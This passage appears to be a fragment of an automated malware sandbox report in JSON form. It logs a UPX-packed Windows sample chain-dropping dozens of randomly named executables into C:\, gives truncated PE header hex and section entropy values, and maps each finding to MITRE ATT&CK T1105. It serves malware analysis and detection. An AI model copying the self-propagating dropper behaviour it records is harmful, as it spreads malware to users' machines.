4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tnhhvv.exe\" wrote 14154 bytes starting with PE header signature to file \"C:\\fhrbxhx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fhrbxhx.exe\" wrote 14171 bytes starting with PE header signature to file \"C:\\lnvvbl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lnvvbl.exe\" wrote 14187 bytes starting with PE header signature to file \"C:\\64088.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"64088.exe\" wrote 14198 bytes starting with PE header signature to file \"C:\\6022622.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6022622.exe\" wrote 14209 bytes starting with PE header signature to file \"C:\\rxvbljj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rxvbljj.exe\" wrote 14228 bytes starting with PE header signature to file \"C:\\fpfntvj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fpfntvj.exe\" wrote 14242 bytes starting with PE header signature to file \"C:\\hxtbvp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hxtbvp.exe\" wrote 14256 bytes starting with PE header signature to file \"C:\\jxxfdjd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jxxfdjd.exe\" wrote 14274 bytes starting with PE header signature to file \"C:\\xbnptrh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xbnptrh.exe\" wrote 14284 bytes starting with PE header signature to file \"C:\\dbjvvrj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dbjvvrj.exe\" wrote 14295 bytes starting with PE header signature to file \"C:\\6440024.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6440024.exe\" wrote 14311 bytes starting with PE header signature to file \"C:\\880026.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"880026.exe\" wrote 14329 bytes starting with PE header signature to file \"C:\\282866.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"282866.exe\" wrote 14339 bytes starting with PE header signature to file \"C:\\264846.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"264846.exe\" wrote 14349 bytes starting with PE header signature to file \"C:\\884020.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"884020.exe\" wrote 14366 bytes starting with PE header signature to file \"C:\\2268206.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2268206.exe\" wrote 14382 bytes starting with PE header signature to file \"C:\\20024.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"20024.exe\" wrote 14394 bytes starting with PE header signature to file \"C:\\026844.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"026844.exe\" wrote 14405 bytes starting with PE header signature to file \"C:\\48022.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"48022.exe\" wrote 14419 bytes starting with PE header signature to file \"C:\\0002440.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0002440.exe\" wrote 14438 bytes starting with PE header signature to file \"C:\\828406.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"828406.exe\" wrote 14449 bytes starting with PE header signature to file \"C:\\fxlhpd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fxlhpd.exe\" wrote 14463 bytes starting with PE header signature to file \"C:\\vldbx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vldbx.exe\" wrote 14473 bytes starting with PE header signature to file \"C:\\646228.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"646228.exe\" wrote 14487 bytes starting with PE header signature to file \"C:\\808828.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"808828.exe\" wrote 14503 bytes starting with PE header signature to file \"C:\\66026.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"66026.exe\" wrote 14523 bytes starting with PE header signature to file \"C:\\466286.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"466286.exe\" wrote 14533 bytes starting with PE header signature to file \"C:\\6020448.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6020448.exe\" wrote 14549 bytes starting with PE header signature to file \"C:\\2044406.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2044406.exe\" wrote 14563 bytes starting with PE header signature to file \"C:\\660206.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"660206.exe\" wrote 14575 bytes starting with PE header signature to file \"C:\\280844.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"280844.exe\" wrote 14592 bytes starting with PE header signature to file \"C:\\vfxjdn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vfxjdn.exe\" wrote 14604 bytes starting with PE header signature to file \"C:\\nnvhlr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nnvhlr.exe\" wrote 14618 bytes starting with PE header signature to file \"C:\\xjpjtlp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xjpjtlp.exe\" wrote 14635 bytes starting with PE header signature to file \"C:\\0880828.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0880828.exe\" wrote 14653 bytes starting with PE header signature to file \"C:\\4804844.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4804844.exe\" wrote 14669 bytes starting with PE header signature to file \"C:\\2686426.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2686426.exe\" wrote 14687 bytes starting with PE header signature to file \"C:\\tvlvjll.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tvlvjll.exe\" wrote 14697 bytes starting with PE header signature to file \"C:\\tdxhf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tdxhf.exe\" wrote 14711 bytes starting with PE header signature to file \"C:\\rlvbpdv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rlvbpdv.exe\" wrote 14728 bytes starting with PE header signature to file \"C:\\frphr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"frphr.exe\" wrote 14738 bytes starting with PE header signature to file \"C:\\nndjbrh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nndjbrh.exe\" wrote 14757 bytes starting with PE header signature to file \"C:\\0246246.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0246246.exe\" wrote 14777 bytes starting with PE header signature to file \"C:\\466842.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"466842.exe\" wrote 14796 bytes starting with PE header signature to file \"C:\\284804.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"284804.exe\" wrote 14815 bytes starting with PE header signature to file \"C:\\lvjhvdf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"466480.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"nfxflv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"00680.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"xxdfh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"604488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jvxvt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rjrxrhl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hptvf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rbffrbx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"nffbnt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"88880.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"60248.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jtxbhtx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lvjhvdf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lvjhvdf.exe]- [targetUID: 00000000-00002200]\n \"284804.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\284804.exe]- [targetUID: 00000000-00003568]\n \"466842.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\466842.exe]- [targetUID: 00000000-00003568]\n \"0246246.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0246246.exe]- [targetUID: 00000000-00004500]\n \"nndjbrh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nndjbrh.exe]- [targetUID: 00000000-00003076]\n \"frphr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\frphr.exe]- [targetUID: 00000000-00003604]\n \"rlvbpdv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rlvbpdv.exe]- [targetUID: 00000000-00003604]\n \"tdxhf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tdxhf.exe]- [targetUID: 00000000-00000788]\n \"tvlvjll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tvlvjll.exe]- [targetUID: 00000000-00002824]\n \"2686426.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2686426.exe]- [targetUID: 00000000-00000812]\n \"4804844.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4804844.exe]- [targetUID: 00000000-00003876]\n \"0880828.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0880828.exe]- [targetUID: 00000000-00003876]\n \"xjpjtlp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xjpjtlp.exe]- [targetUID: 00000000-00000416]\n \"nnvhlr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nnvhlr.exe]- [targetUID: 00000000-00000416]\n \"vfxjdn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vfxjdn.exe]- [targetUID: 00000000-00003140]\n \"280844.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\280844.exe]- [targetUID: 00000000-00003140]\n \"660206.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\660206.exe]- [targetUID: 00000000-00001164]\n \"2044406.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2044406.exe]- [targetUID: 00000000-00000712]\n \"6020448.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6020448.exe]- [targetUID: 00000000-00000468]\n \"466286.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\466286.exe]- [targetUID: 00000000-00000468]\n \"66026.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\66026.exe]- [targetUID: 00000000-00002844]\n \"808828.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\808828.exe]- [targetUID: 00000000-00002844]\n \"646228.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\646228.exe]- [targetUID: 00000000-00004436]\n \"vldbx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vldbx.exe]- [targetUID: 00000000-00003668]\n \"fxlhpd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fxlhpd.exe]- [targetUID: 00000000-00003668]\n \"828406.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\828406.exe]- [targetUID: 00000000-00004404]\n \"0002440.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0002440.exe]- [targetUID: 00000000-00004404]\n \"48022.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\48022.exe]- [targetUID: 00000000-00003988]\n \"026844.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\026844.exe]- [targetUID: 00000000-00003988]\n \"20024.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\20024.exe]- [targetUID: 00000000-00004416]\n \"2268206.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2268206.exe]- [targetUID: 00000000-00004416]\n \"884020.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\884020.exe]- [targetUID: 00000000-00003180]\n \"264846.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\264846.exe]- [targetUID: 00000000-00003180]\n \"282866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\282866.exe]- [targetUID: 00000000-00002380]\n \"880026.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\880026.exe]- [targetUID: 00000000-00002380]\n \"6440024.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6440024.exe]- [targetUID: 00000000-00003516]\n \"dbjvvrj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dbjvvrj.exe]- [targetUID: 00000000-00003516]\n \"xbnptrh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xbnptrh.exe]- [targetUID: 00000000-00003520]\n \"jxxfdjd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jxxfdjd.exe]- [targetUID: 00000000-00003344]\n \"hxtbvp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hxtbvp.exe]- [targetUID: 00000000-00003344]\n \"fpfntvj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fpfntvj.exe]- [targetUID: 00000000-00003600]\n \"rxvbljj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rxvbljj.exe]- [targetUID: 00000000-00003600]\n \"6022622.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6022622.exe]- [targetUID: 00000000-00001072]\n \"64088.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64088.exe]- [targetUID: 00000000-00003172]\n \"lnvvbl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lnvvbl.exe]- [targetUID: 00000000-00004372]\n \"fhrbxhx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fhrbxhx.exe]- [targetUID: 00000000-00004372]\n \"tnhhvv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tnhhvv.exe]- [targetUID: 00000000-00003628]\n \"lrxfh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lrxfh.exe]- [targetUID: 00000000-00004092]\n \"dljfl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dljfl.exe]- [targetUID: 00000000-00004092]\n \"nbhbvdb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nbhbvdb.exe]- [targetUID: 00000000-00003944]\n \"vtttbl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vtttbl.exe]- [targetUID: 00000000-00003944]\n \"pvvxhx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pvvxhx.exe]- [targetUID: 00000000-00002812]\n \"ndtrth.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ndtrth.exe]- [targetUID: 00000000-00004152]\n \"hnvfx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hnvfx.exe]- [targetUID: 00000000-00004152]\n \"44828.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\44828.exe]- [targetUID: 00000000-00006084]\n \"828684.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\828684.exe]- [targetUID: 00000000-00005900]\n \"682088.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\682088.exe]- [targetUID: 00000000-00006076]\n \"60480.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\60480.exe]- [targetUID: 00000000-00006076]\n \"4484802.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4484802.exe]- [targetUID: 00000000-00005876]\n \"6002286.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6002286.exe]- [targetUID: 00000000-00004108]\n \"248486.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\248486.exe]- [targetUID: 00000000-00004108]\n \"02006.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\02006.exe]- [targetUID: 00000000-00005764]\n \"282462.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\282462.exe]- [targetUID: 00000000-00006016]\n \"442800.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\442800.exe]- [targetUID: 00000000-00006052]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963\" has section name UPX1 with entropy \"7.97244478673\"\n \"466480.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"nfxflv.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"00680.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"xxdfh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"604488.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"jvxvt.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rjrxrhl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"hptvf.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rbffrbx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"nffbnt.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"88880.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"60248.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"jtxbhtx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"lvjhvdf.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"284804.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"466842.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"0246246.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"nndjbrh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"frphr.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rlvbpdv.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"tdxhf.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"tvlvjll.exe\" has section name UPX1 with entropy 